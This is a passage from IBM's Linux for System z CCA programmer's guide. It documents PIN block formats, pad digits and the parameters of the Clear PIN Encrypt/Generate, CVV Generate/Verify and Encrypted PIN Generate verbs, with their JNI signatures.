codeX'7E0'. +||| 3621or3624format Clear PIN Generate Alternate PINextractiondeterminesthePINlengthbyscanning +||| andPADDIGIT Encrypted PIN Translate fromrighttoleftuntiladigit,notequaltothePADdigit, +|| Encrypted PIN Verify isfound.TheminimumPINlengthissetatfourdigits,so +|| PIN Change/Unblock scanningceasesonedigitpastthepositionofthefourth +| PINdigitintheblock. +||| 3621or3624format Clear PIN Encrypt PINformattingdoesnotexaminethePIN,intheoutput +||| andPADDIGIT Encrypted PIN Generate PINblock,toseeifitcontainsthePADdigit. +| Encrypted PIN Translate +||| 3621or3624format EncryptedPINTranslate Restrictedtonon-decimaldigitforPADdigit. +| andPADDIGIT +| +Format control +| +This keyword specifies whether there is any control on the user-supplied PIN format. The 8-byte value +must be left-justified and padded with blanks. The only permitted value is NONE, which indicates no +format control will be used. +Chapter9.Financialservices 309 + +Pad digit +Some PIN formats require the pad digit parameter. If the PIN format does not need a pad digit, the verb +ignores this parameter. Table76 shows the format of a pad digit. The PIN profile pad digit must be +specified in upper case. +Table76.Formatofapaddigit +Bytes Description +16-22 Sevenspacecharacters +23 Characterrepresentationofahexadecimalpaddigitoraspaceifapaddigitisnotneeded.Characters +mustbeoneofthefollowing:digits0-9,lettersA-F,orablank. +Each PIN format supports only a pad digit in a certain range. Table77 lists the valid pad digits for each +PIN block format. +Table77.PaddigitsforPINblockformats +PINBlockFormat OutputPINProfile InputPINProfile +ECI-2 Paddigitisnotused Paddigitisnotused +ECI-3 Paddigitisnotused Paddigitisnotused +ISO-0 F Paddigitisnotused +ISO-1 Paddigitisnotused Paddigitisnotused +ISO-2 Paddigitisnotused Paddigitisnotused +ISO-3 Paddigitisnotused Paddigitisnotused +VISA-2 0-9 Paddigitisnotused +VISA-3 0-F Paddigitisnotused +VISA-4 F Paddigitisnotused +3621 0-F 0-F +3624 0-F 0-F +4704-EPP F Paddigitisnotused +| The verb returns an error indicating that the PAD digit is not valid if all of these conditions are met: +| v The PTR Enhanced PIN Security (offset X'0313') access control point is enabled in the active role. +| v The output PIN profile specifies 3621 or 3624 as the PIN-block format. +| v The output PIN profile specifies a decimal digit (0 - 9) as the PAD digit. +Recommendations for the pad digit +IBM recommends you use a non-decimal pad digit in the range ofA- F when processing IBM 3624 and +IBM 3621 PIN blocks. If you use a decimal pad digit, the creator of the PIN block must ensure that the +calculated PIN does not contain the pad digit, or unpredictable results might occur. +For example, you can exclude a specific decimal digit from being in any calculated PIN by using the IBM +3624 calculation procedure and by specifying a decimalization table that does not contain the desired +decimal pad digit. +Current key serial number +The current key serial number is the concatenation of the initial key serial number (a 59-bit value) and the +encryption counter (a 21-bit value). The concatenation is an 80-bit (10-byte) value. Table78 on page 311 +shows the format of the current key serial number. +310 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +When UKPT or DUKPT is specified, the PIN profile parameter is extended to a 48-byte field and must +contain the current key serial number. +Table78.FormatoftheCurrentKeySerialNumberField +Bytes Description +24-47 CharacterrepresentationofthecurrentkeyserialnumberusedtoderivetheinitialPINencryptingkey.It +isleftjustifiedandpaddedwith4blanks. +Chapter9.Financialservices 311 + +Clear PIN Encrypt (CSNBCPE) +Clear PIN Encrypt (CSNBCPE) +The Clear PIN Encrypt verb formats a PIN into one of the following PIN block formats and encrypts the +results. You can use this verb to create an encrypted PIN block for transmission. With the RANDOM +keyword, you can have the verb generate random PIN numbers. +Note: Aclear PIN is a sensitive piece of information. Ensure your application program and system design +provide adequate protection for any clear PIN value. +v IBM 3621 format +v IBM 3624 format +v ISO-0 format (same as theANSI X9.8, VISA-1, and ECI formats) +v ISO-1 format (same as the ECI-4 format) +v ISO-2 format +v ISO-3 format +v IBM 4704 encrypting PINPAD (4704-EPP) format +v VISA2 format +v VISA3 format +v VISA4 format +v ECI2 format +v ECI3 format +Format +CSNBCPE( +return_code, +reason_code, +exit_data_length, +exit_data, +PIN_encrypting_key_identifier, +rule_array_count, +rule_array, +clear_PIN, +PIN_profile, +PAN_data, +sequence_number +encrypted_PIN_block ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +PIN_encrypting_key_identifier +Direction: Input/Output Type: String +The 64-byte string containing an internal key token or a key label of an internal key token. The internal +key token contains the key that encrypts the PIN block. The control vector in the internal key token +must specify an OPINENC key type and have the CPINENC usage bit set to 1. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. Valid +values are 0, 1, and 2. +rule_array +312 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear PIN Encrypt (CSNBCPE) +Direction: Input Type: String +Keywords that provide control information to the verb. The keyword is left-justified in an 8-byte field +and padded on the right with blanks.All keywords must be in contiguous storage. The rule_array +keywords are described in Table79 +Table79.KeywordsforClearPINEncryptcontrolinformation +Keyword Description +| ProcessRule(Optional) +ENCRYPT Thisisthedefault.Useofthiskeywordisoptional. +RANDOM CausestheverbtogeneratearandomPINvalue.ThelengthofthePINisbasedonthevaluein +theclear_PINvariable.SetthevalueoftheclearPINtozeroanduseasmanydigitsasthe +desiredrandomPIN;padtheremainderoftheclearPINvariablewithspacecharacters. +clear_PIN +Direction: Input Type: String +A16-character string with the clear PIN. The value in this variable must be left-justified and padded on +the right with space characters. +PIN_profile +Direction: Input Type: String +A24-byte string containing three 8-byte elements with a PIN block format keyword, the format control +keyword, NONE, and a pad digit as required by certain formats. See “The PIN profile” on page 307 for +additional information. +PAN_data +Direction: Input Type: String +A12-byte PAN in character format. The verb uses this parameter if the PIN profile specifies the ISO-0, +ISO-3 or VISA-4 keyword for the PIN block format. Otherwise, ensure this parameter is a 12-byte +variable in application storage. The information in this variable will be ignored, but the variable must be +specified. +Note: When using the ISO-0 or ISO-3 keyword, use the 12 rightmost digits of the PAN data, excluding +the check digit. When using the VISA-4 keyword, use the 12 leftmost digits of the PAN data, +excluding the check digit. +sequence_number +Direction: Input Type: Integer +The 4-byte character integer. The verb currently ignores the value in this variable. For future +compatibility, the suggested value is 99999. +encrypted_PIN_block +Direction: Output Type: String +The field that receives the 8-byte encrypted PIN block. +Restrictions +The format control specified in the PIN profile must be NONE. +Required commands +| This verb requires the Clear PIN Encrypt command (offset X'00AF') to be enabled in the active role. +Chapter9.Financialservices 313 + +Clear PIN Encrypt (CSNBCPE) +| An enhanced PIN security mode is available for formatting an encrypted PIN-block into IBM 3621 or 3624 +| format using the PADDIGIT PIN-extraction method. This mode limits checking of the PIN to decimal digits; +| no other PIN-block consistency checking will occur. To activate this mode, enable the PTR Enhanced PIN +| Security command (offset X'0313') in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCPEJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCPEJ are shown here. +Format +public native void CSNBCPEJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] PIN_encrypting_key_identifier, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] clear_PIN, +byte[] PIN_profile, +byte[] PAN_data, +hikmNativeInteger sequence_number, +byte[] encrypted_PIN_block +); +314 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear PIN Generate (CSNBPGN) +Clear PIN Generate (CSNBPGN) +Use the Clear PIN Generate verb to generate a clear PIN, a PIN validation value (PVV), or an offset +according to an algorithm. You supply the algorithm or process rule using the rule_array parameter. +v IBM 3624 (IBM-PIN or IBM-PINO) +v VISAPIN validation value (VISA-PVV) +v Interbank PIN (INBK-PIN) +For guidance information about VISA, see their appropriate publications. +Format +CSNBPGN( +return_code, +reason_code, +exit_data_length, +exit_data, +PIN_generating_key_identifier, +rule_array_count, +rule_array, +PIN_length, +PIN_check_length, +data_array, +returned_result ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +PIN_generating_key_identifier +Direction: Input/Output Type: String +The 64-byte key label or internal key token that identifies the PIN generation (PINGEN) key. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1. +rule_array +Direction: Input Type: String +The process rule provides control information to the verb. The keyword is left-justified in an 8-byte field +and padded on the right with blanks. The rule_array keyword is described in Table80. +Table80.KeywordsforClearPINGeneratecontrolinformation +Keyword Description +| ProcessRule(One,required) +GBP-PIN TheIBMGermanBankPoolPIN,whichusestheinstitutionPINGENkeytogenerateaninstitution +PIN(IPIN). +IBM-PIN TheIBM3624PIN,whichisaninstitution-assignedPIN.ItdoesnotcalculatethePINoffset. +IBM-PINO TheIBM3624PINoffset,whichisacustomer-selectedPINandcalculatesthePINoffset(the +output). +INBK-PIN TheInterbankPINthatisgenerated. +Chapter9.Financialservices 315 + +Clear PIN Generate (CSNBPGN) +Table80.KeywordsforClearPINGeneratecontrolinformation (continued) +Keyword Description +VISA-PVV TheVISAPINvalidationvalue.InputisthecustomerPIN. +PIN_length +Direction: Input Type: Integer +The length of the PIN used for the IBM algorithms only, IBM-PIN or IBM-PINO. Otherwise, this +parameter is ignored. Specify an integer from 4 - 16. +PIN_check_length +Direction: Input Type: Integer +The length of the PIN offset used for the IBM-PINO process rule only. Otherwise, this parameter is +ignored. Specify an integer from 4 - 16. +Note: The PIN check length must be less than or equal to the integer specified in the PIN_length +parameter. +data_array +Direction: Input Type: String +Three 16-byte data elements required by the corresponding rule_array parameter. The data array +consists of three 16-byte fields or elements whose specification depends on the process rule. If a +process rule only requires one or two 16-byte fields, the rest of the data array is ignored by the verb. +Table81 describes the array elements. +Table81.ArrayelementsfortheClearPINGenerateverb +ArrayElement Description +Clear_PIN ClearuserselectedPINof4-12digitsof0-9.Left-justifiedandpaddedwithspaces.For +IBM-PINO,thisistheclearcustomerPIN(CSPIN). +Decimalization_table DecimalizationtableforIBMandGBPonly.Sixteendigitsof0-9. +Trans_sec_parm ForVISAonly,theleftmostsixteendigits.Elevendigitsofthepersonalaccountnumber +(PAN).Onedigitkeyindex.FourdigitsofcustomerselectedPIN. +ForInterbankonly,sixteendigits.Elevenrightmostdigitsofthepersonalaccountnumber +(PAN).Aconstantof6.Onedigitkeyselectorindex.ThreedigitsofPINvalidationdata. +Validation_data ValidationdataforIBMandIBMGermanBankPoolpaddedto16bytes.Onetosixteen +charactersofhexadecimalaccountdataleft-justifiedandpaddedontherightwithblanks. +Table82 lists the data array elements required by the process rule (rule_array parameter). The +numbers refer to the process rule's position within the array. +Table82.ArrayelementsforClearPINGenerate +ProcessRule IBM-PIN IBM-PINO GBP-PIN GBP-PINO VISA-PVV INBK-PIN +Decimalization_table 1 1 1 1 +Validation_data 2 2 2 2 +Clear_PIN 3 3 +Trans_sec_parm 1 1 +Note: Generate offset for GBP algorithm is equivalent to IBM offset generation with PIN_check_length +of 4 and PIN_length of 6. +returned_result +316 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear PIN Generate (CSNBPGN) +Direction: Output Type: String +The 16-byte generated output, left-justified, and padded on the right with blanks. +Restrictions +None +Required commands +| This verb requires the Clear PIN Generate - 3624 command (offset X'00A0') to be enabled in the active +| role. +Usage notes +If you are using the IBM 3624 PIN and IBM German Bank Pool PIN algorithms, you can supply an +unencrypted customer selected PIN to generate a PIN offset. +Related information +The algorithms are discussed in detail inAppendixE, “PIN formats and algorithms,” on page 477. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBPGNJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBPGNJ are shown here. +Format +public native void CSNBPGNJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] PIN_generating_key_identifier, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PIN_length, +hikmNativeInteger PIN_check_length, +byte[] data_array, +byte[] returned_result +); +Chapter9.Financialservices 317 + +Clear PIN Generate Alternate (CSNBCPA) +Clear PIN Generate Alternate (CSNBCPA) +Use the Clear PIN GenerateAlternate verb to generate a clear VISAPVV (PIN validation value) from an +input encrypted PIN block or to produce a 3624 offset from a customer-selected encrypted PIN. The PIN +block can be encrypted under either an input PIN-encrypting key (IPINENC) or an output PIN-encrypting +key (OPINENC). +Format +CSNBCPA( +return_code, +reason_code, +exit_data_length, +exit_data, +PIN_encryption_key_identifier, +PIN_generation_key_identifier, +PIN_profile, +PAN_data, +encrypted_PIN_block, +rule_array_count, +rule_array, +PIN_check_length, +data_array, +returned_PVV ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +PIN_encryption_key_identifier +Direction: Input/Output Type: String +A64-byte string consisting of an internal token that contains an IPINENC or OPINENC key or the label +of an IPINENC or OPINENC key that is used to encrypt the PIN block. If you specify a label, it must +resolve uniquely to either an IPINENC or OPINENC key. +PIN_generation_key_identifier +Direction: Input/Output Type: String +A64-byte string that consists of an internal token that contains a PIN generation (PINGEN) key or the +label of a PINGEN key. +PIN_profile +Direction: Input Type: String +The three 8-byte character elements that contain information necessary to extract a PIN from a +formatted PIN block. The pad digit is needed to extract the PIN from a 3624 or 3621 PIN block in the +Clear PIN GenerateAlternate verb. See “The PIN profile” on page 307 for additional information. +PAN_data +Direction: Input Type: String +A12-byte field that contains 12 characters of PAN data. The personal account number recovers the +PIN from the PIN block if the PIN profile specifies ISO-0 or VISA-4 block formats. Otherwise it is +ignored, but you must specify this parameter. +For ISO-0 or ISO-3, use the rightmost 12 digits of the PAN, excluding the check digit. For VISA-4, use +the leftmost 12 digits of the PAN, excluding the check digit. +encrypted_PIN_block +318 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear PIN Generate Alternate (CSNBCPA) +Direction: Input Type: String +An 8-byte field that contains the encrypted PIN that is input to the VISAPVV generation algorithm. The +verb uses the IPINENC or OPINENC key that is specified in the PIN_encryption_key_identifier +parameter to encrypt the block. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 1 or 2. If the default extraction method for a PIN block format is desired, specify the +rule_array_count value as 1. +rule_array +Direction: Input Type: String +The process rule for the PIN generation algorithm. Specify IBM-PINO or VISA-PVV (the VISAPIN +verification value) in an 8-byte field, left-justified, and padded with blanks. The rule_array points to an +array of one or two 8-byte elements. The rule_array keywords are described in Table83. +|| Table83.KeywordsforClearPINGenerateAlternatecontrolinformation +|| Keyword Description +| PINcalculationmethod(Onerequired) +|| IBM-PINO ThiskeywordspecifiesuseoftheIBM3624PINOffsetcalculationmethod. +|| VISA-PVV ThiskeywordspecifiesuseoftheVISAPVVcalculationmethod. +| PINextractionmethod(Oneoptional)Seethetextfollowingthistable. +| +| If the PIN extraction method is provided, one of the PIN extraction method keywords shown in +| Table74 on page 308 can be specified for the given PIN block format. See “PIN block format and PIN +| extraction method keywords” on page 308 for additional information. If the default extraction method +| for a PIN block format is desired, specify the rule_array_count value as 1. +The PIN extraction methods operate as follows: +PINBLOCK +Specifies that the verb use one of the following: +v The PIN length, if the PIN block contains a PIN length field +v The PIN delimiter character, if the PIN block contains a PIN delimiter character. +PADDIGIT +Specifies that the verb use the pad value in the PIN profile to identify the end of the PIN. +HEXDIGIT +Specifies that the verb use the first occurrence of a digit in the range from X'A' to X'F' as the +pad value to determine the PIN length. +PINLENnn +Specifies that the verb use the length specified in the keyword, where nn can range from 04 - +16, to identify the PIN. +| The PINLENnn keywords are disabled for this verb by default. If these keywords are used, +| return code 8 with reason code 33 is returned. To enable them, the PTR Enhanced PIN +| Security command (bit X'0313') must be enabled using a TKE. +PADEXIST +Specifies that the verb use the character in the 16th position of the PIN block as the value of +the pad value. +PIN_check_length +Chapter9.Financialservices 319 + +Clear PIN Generate Alternate (CSNBCPA) +Direction: Input Type: Integer +The length of the PIN offset used only for the IBM-PINO process rule. Otherwise, this parameter is +ignored. Specify an integer from 4 - 16. +Note: The PIN check length must be less than or equal to the integer specified in the PIN_length +parameter. +data_array +Direction: Input Type: String +Three 16-byte elements. Table84 describes the format when IBM-PINO is specified. Table85 +describes the format when VISA-PVV is specified. +Table84.ArrayelementsforClearPINGenerateAlternate,data_array(IBM-PINO) +Arrayelement Description +decimalization_table Thiselementcontainsthedecimalizationtableof16characters(0-9)thatareusedto +converthexadecimaldigits(X'0'-X'F')oftheencipheredvalidationdatatothedecimal +digits(X'0'-X'9'). +validation_data Thiselementcontains1-16charactersofaccountdata.Thedatamustbeleftjustified +andpaddedontherightwithspacecharacters. +Reserved-3 Thisfieldisignored,butyoumustspecifyit. +Table85.ArrayelementsforClearPINGenerateAlternate,data_array(VISA-PVV) +Arrayelement Description +Trans_sec_parm ForVISA-PVVonly,theleftmosttwelvedigits.Elevendigitsofthepersonalaccount +number(PAN).Onedigitkeyindex.Therestofthefieldisignored. +Reserved-2 Thisfieldisignored,butyoumustspecifyit. +Reserved-3 Thisfieldisignored,butyoumustspecifyit. +returned_PVV +Direction: Output Type: Character +A16-byte area that contains the 4-byte PVV left-justified and padded with blanks. +Restrictions +None +Required commands +This verb requires the commands shown in the following table to be enabled in the active role based on +the keyword specified for the PIN-calculation method: +|||| +Rule-arraykeyword Offset Command +||| IBM-PINO X'00A4' ClearPINGenerateAlternate-3624Offset +||| VISA-PVV X'00BB' ClearPINGenerateAlternate-VISAPVV +| +| An enhanced PIN security mode, on the CEX2C, or CEX3C is available for extracting PINs from encrypted +| PIN blocks. This mode only applies when specifying a PIN-extraction method for an IBM 3621 or an IBM +| 3624 PIN-block. To do this, you must enable the PTR Enhanced PIN Security (offset X'0313') access +| control point in the default role. When activated, this mode limits checking of the PIN to decimal digits and +| a PIN length minimum of 4 is enforced. No other PIN-block consistency checking will occur. +320 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Clear PIN Generate Alternate (CSNBCPA) +| An enhanced PIN security mode on a CEX3C is available beginning with Release 4.1.0, to implement +| restrictions required by theANSI X9.8 PIN standard. The restrictions are to accept only a PIN_profile +| variable that contains a PIN-block format of ISO-0 or ISO-3. To enforce these restrictions, you must enable +| the following access control points in the default role: +| v ANSI X9.8 PIN - Enforce PIN block restrictions (X'0350') +| For more information, see “ANSI X9.8 PIN restrictions” on page 306. +| Note: Arole with offset X'0350' enabled also affects access control of the Encrypted PIN Translate and +| the Secure Messaging for PINs verbs. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCPAJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCPAJ are shown here. +Format +public native void CSNBCPAJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] inbound_PIN_encrypting_key_identifier, +byte[] PIN_generating_key_identifier, +byte[] input_PIN_profile, +byte[] PAN_data, +byte[] encrypted_PIN_block, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger PIN_check_length, +byte[] data_array, +byte[] returned_result ); +Chapter9.Financialservices 321 + +CVV Generate (CSNBCSG) +CVV Generate (CSNBCSG) +Use the CVV Generate verb to generate a VISACard Verification Value (CVV) or MasterCard Card +Verification Code (CVC) as defined for track 2. This verb generates a CVV that is based on the information +that the PAN_data, the expiration_date, and the service_code parameters provide. This verb uses the +Key-Aand the Key-B keys to cryptographically process this information. Key-Aand Key-B can be +single-length DATAor MAC keys. If the requested CVV is shorter than 5 characters, the CVV is padded on +the right by space characters. The CVV is returned in the 5-byte variable that the CVV_value parameter +identifies. When you verify a CVV, compare the result to the value that the CVV_value supplies. +Format +CSNBCSG( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +PAN_data, +expiration_date, +service_code, +CVV_key_A_Identifier, +CVV_key_B_Identifier, +CVV_value ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in 8-byte fields and +padded on the right with blanks.All keywords must be in contiguous storage. The rule_array keywords +are described in Table86. +Table86.KeywordsforCVVGeneratecontrolinformation +Keyword Description +| PANdatalength(One,optional) +PAN-13 SpecifiesthatthelengthofthePANdatais13bytes.PAN-13isthedefaultvalue. +PAN-14 SpecifiesthatthelengthofthePANdatais14bytes. +PAN-15 SpecifiesthatthelengthofthePANdatais15bytes. +PAN-16 SpecifiesthatthelengthofthePANdatais16bytes. +PAN-17 SpecifiesthatthelengthofthePANdatais17bytes. +PAN-18 SpecifiesthatthelengthofthePANdatais18bytes. +PAN-19 SpecifiesthatthelengthofthePANdatais19bytes. +| CVVlength(One,optional) +322 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CVV Generate (CSNBCSG) +Table86.KeywordsforCVVGeneratecontrolinformation (continued) +Keyword Description +CVV-1 SpecifiesthattheCVVistobecomputedasonebyte,followedbyfourblanks.CVV-1isthedefault +value. +CVV-2 SpecifiesthattheCVVistobecomputedastwobytes,followedbythreeblanks. +CVV-3 SpecifiesthattheCVVistobecomputedasthreebytes,followedbytwoblanks. +CVV-4 SpecifiesthattheCVVistobecomputedasfourbytes,followedbyoneblank. +CVV-5 SpecifiesthattheCVVistobecomputedasfivebytes. +PAN_data +Direction: Input Type: String +The PAN_data parameter specifies an address that points to the place in application data storage that +contains personal account number (PAN) information in character form. The PAN is the account +number as defined for the track-2 magnetic-stripe standards. If the PAN-nn keyword is specified in the +rule_array, where nn is a value between 13 and 19, then nn number of characters are processed. +If you specify the PAN-nn keyword in the rule_array where nn is less than 16, the server might copy +16 bytes to a work area. Therefore, ensure that the verb can address 16 bytes of storage. +expiration_date +Direction: Input Type: String +The expiration_date parameter specifies an address that points to the place in application data storage +that contains the card expiration date in numeric character form in a 4-byte field. The application +programmer must determine whether the CVV will be calculated with the date form of YYMM or +MMYY. +service_code +Direction: Input Type: String +The service_code parameter specifies an address that points to the place in application data storage +that contains the service code in numeric character form in a 3-byte field. The service code is the +number that the track-2 magnetic-stripe standards define. The service code of '000' is supported. +CVV_key_A_Identifier +Direction: Input/Output Type: String +The CVV_key_A_Identifier parameter specifies an address that contains a 64-byte internal key token +or a key label of a single-length DATAor MAC key that decrypts information in the CCV process. The +internal key token contains the Key-Akey that encrypts information in the CVV process. +CVV_key_B_Identifier +Direction: Input/Output Type: String +The CVV_key_B_Identifier parameter specifies an address that contains a 64-byte internal key token +or a key label of a single-length DATAor MAC key that decrypts information in the CCV process. The +internal key token contains the Key-B key that decrypts information in the CVV process. +CVV_value +Direction: Output Type: String +The CVV_value parameter specifies an address that points to the place in application data storage +that will be used to store the computed 5-byte character output value. +Chapter9.Financialservices 323 + +CVV Generate (CSNBCSG) +Restrictions +None +Required commands +This verb requires the Generate CVV command (offset X'00DF') to be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCSGJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCSGJ are shown here. +Format +public native void CSNBCSGJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] PAN_data, +byte[] expiration_date, +byte[] service_code, +byte[] key_a_id, +byte[] key_b_id, +byte[] generated_cvv); +324 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CVV Verify (CSNBCSV) +CVV Verify (CSNBCSV) +Use the CVV Verify verb to verify a VISACard Verification Value (CVV) or MasterCard Card Verification +Code (CVC) as defined for track 2. This verb generates a CVV based on the information the PAN_data, +the expiration_date, and the service_code parameters provide. This verb uses the Key-Aand the Key-B +keys to cryptographically process this information. If the requested CVV is shorter than 5 characters, the +CVV is padded on the right by space characters. The generated CVV is then compared to the value that +the CVV_value supplies for verification. +Format +CSNBCSV( +return_code, +reason_code, +exit_data_length, +exit_data, +rule_array_count, +rule_array, +PAN_data, +expiration_date, +service_code, +CVV_key_A_Identifier, +CVV_key_B_Identifier, +CVV_value ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, or 2. +rule_array +Direction: Input Type: String +Keywords that provide control information to the verb. Each keyword is left-justified in 8-byte fields and +padded on the right with blanks.All keywords must be in contiguous storage. The rule_array keywords +are described in Table87. +Table87.KeywordsforCVVVerifycontrolinformation +Keyword Description +| PANdatalength(One,optional) +PAN-13 SpecifiesthatthelengthofthePANdatais13bytes.PAN-13isthedefaultvalue. +PAN-14 SpecifiesthatthelengthofthePANdatais14bytes. +PAN-15 SpecifiesthatthelengthofthePANdatais15bytes. +PAN-16 SpecifiesthatthelengthofthePANdatais16bytes. +PAN-17 SpecifiesthatthelengthofthePANdatais17bytes. +PAN-18 SpecifiesthatthelengthofthePANdatais18bytes. +PAN-19 SpecifiesthatthelengthofthePANdatais19bytes. +| CVVlength(One,optional) +Chapter9.Financialservices 325 + +CVV Verify (CSNBCSV) +Table87.KeywordsforCVVVerifycontrolinformation (continued) +Keyword Description +CVV-1 SpecifiesthattheCVVistobecomputedasonebyte,followedbyfourblanks.CVV-1isthedefault +value. +CVV-2 SpecifiesthattheCVVistobecomputedastwobytes,followedbythreeblanks. +CVV-3 SpecifiesthattheCVVistobecomputedasthreebytes,followedbytwoblanks. +CVV-4 SpecifiesthattheCVVistobecomputedasfourbytes,followedbyoneblank. +CVV-5 SpecifiesthattheCVVistobecomputedasfivebytes. +PAN_data +Direction: Input Type: String +The PAN_data parameter specifies an address that points to the place in application data storage that +contains personal account number (PAN) information in character form. The PAN is the account +number as defined for the track-2 magnetic-stripe standards. If the PAN-nn keyword is specified in the +rule_array, where nn is a value between 13 and 19, then nn number of characters are processed. +If you specify the PAN-nn keyword in the rule_array where nn is less than 16, the server might copy +16 bytes to a work area. Therefore, ensure that the verb can address 16 bytes of storage. +expiration_date +Direction: Input Type: String +The expiration_date parameter specifies an address that points to the place in application data storage +that contains the card expiration date in numeric character form in a 4-byte field. The application +programmer must determine whether the CVV will be calculated with the date form of YYMM or +MMYY. +service_code +Direction: Input Type: String +The service_code parameter specifies an address that points to the place in application data storage +that contains the service code in numeric character form in a 3-byte field. The service code is the +number that the track-2 magnetic-stripe standards define. The service code of '000' is supported. +CVV_key_A_Identifier +Direction: Input/Output Type: String +The CVV_key_A_Identifier parameter specifies an address that contains a 64-byte internal key token +or a key label of a single-length DATA, MAC, or MACVER key that decrypts information in the CCV +process. The internal key token contains the Key-Akey that encrypts information in the CVV process. +CVV_key_B_Identifier +Direction: Input/Output Type: String +The CVV_key_B_Identifier parameter specifies an address that contains a 64-byte internal key token +or a key label of a single-length DATA, MAC, or MACVER key that decrypts information in the CCV +process. The internal key token contains the Key-B key that decrypts information in the CVV process. +CVV_value +Direction: Input Type: String +The CVV_value parameter specifies an address that contains the CVV value which will be compared +to the computed CVV value. This is a 5-byte field. +326 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +CVV Verify (CSNBCSV) +Restrictions +None +Required commands +This verb requires the Verify CVV command (offset X'00E0') to be enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBCSVJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBCSVJ are shown here. +Format +public native void CSNBCSVJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] PAN_data, +byte[] expiration_date, +byte[] service_code, +byte[] key_a_id, +byte[] key_b_id, +byte[] generated_cvv); +Chapter9.Financialservices 327 + +Encrypted PIN Generate (CSNBEPG) +Encrypted PIN Generate (CSNBEPG) +The Encrypted PIN Generate verb formats a PIN and encrypts the PIN block. To generate the PIN, the +verb uses one of the following PIN calculation methods: +v IBM 3624 PIN +v IBM German Bank Pool Institution PIN +v Interbank PIN +To format the PIN, the verb uses one of the following PIN block formats: +v IBM 3621 format +v IBM 3624 format +v ISO-0 format (same as theANSI X9.8, VISA-1, and ECI-1 formats) +v ISO-1 format (same as the ECI-4 format) +v ISO-2 format +v ISO-3 format +v IBM 4704 encrypting PINPAD (4704-EPP) format +v VISA2 format +v VISA3 format +v VISA4 format +v ECI-2 format +v ECI-3 format +Format +CSNBEPG( +return_code, +reason_code, +exit_data_length, +exit_data, +PIN_generating_key_identifier, +outbound_PIN_encrypting_key_identifier +rule_array_count, +rule_array, +PIN_length, +data_array, +PIN_profile, +PAN_data, +sequence_number +encrypted_PIN_block ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +PIN_generating_key_identifier +Direction: Input/Output Type: String +The 64-byte internal key token or a key label of an internal key token in the DES key storage file. The +internal key token contains the PIN-generating key. The control vector must specify the PINGEN key +type and have the EPINGEN usage bit set to 1. +outbound_PIN_encrypting_key_identifier +Direction: Input Type: String +328 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Encrypted PIN Generate (CSNBEPG) +A64-byte internal key token or a key label of an internal key token in the DES key storage file. The +internal key token contains the key to be used to encrypt the formatted PIN and must contain a control +vector that specifies the OPINENC key type and 